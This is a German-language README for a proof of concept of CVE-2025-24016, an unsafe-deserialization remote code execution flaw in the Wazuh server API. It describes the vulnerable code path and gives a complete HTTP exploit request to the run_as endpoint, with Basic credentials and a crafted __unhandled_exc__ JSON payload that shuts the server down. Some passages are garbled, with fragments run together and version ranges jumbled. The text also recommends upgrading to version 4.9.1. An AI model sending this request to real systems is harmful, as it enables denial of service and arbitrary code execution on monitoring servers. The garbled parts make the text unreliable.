
CVE-2025-24016: RCE in Wazuh server! Remote-Codeausführung
Dieses Repository demonstriert die Remote-Code-Execution-Schwachstelle (RCE) im Wazuh-Server, die durch eine unsichere Deserialisierung im Paket wazuh-manager eingeführt wird. Die Schwachstelle ermöglicht es entfernten Angreifern mit API-Zugriff (kompromittiertes Dashboard, Wazuh-Server im Cluster oder bestimmte Konfigurationen mit kompromittierten Agents), beliebigen Code auf dem Server auszuführen.
wazuh-manager Version >= 4.4.0>= 4.9.1 gepatchtDie Schwachstelle tritt in der Wazuh-API auf, wo Parameter im DistributedAPI als JSON serialisiert und mithilfe von in der Datei deserialisiert werden. Ein Angreifer kann diese Schwachstelle ausnutzen, indem er ein nicht bereinigtes Wörterbuch in DAPI-Anfragen einschleust, was zur Auswertung von beliebigem Python-Code führen kann.
as_wazuh_objectframework/wazuh/core/cluster/common.pyDie RCE kann über den Endpunkt run_as ausgelöst werden, der es dem Angreifer erlaubt, das Argument auth_context zu kontrollieren. Durch das Erstellen einer bösartigen Anfrage kann beliebiger Code auf dem Master-Server ausgeführt werden.
Um diese Schwachstelle über die Server-API auszulösen, führen Sie die folgenden Schritte aus.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__, die die Ausführung von beliebigem Python-Code (exit in diesem Fall) auslöst.>= 4.4.0 bis 4.9.0 (noch nicht gepatcht).exit ausgelöst, was dazu führt, dass der Wazuh-Server heruntergefahren wird.Zum Schutz Ihrer Systeme aktualisieren Sie auf Wazuh Version >= 4.9.1, in der dieses Problem behoben ist.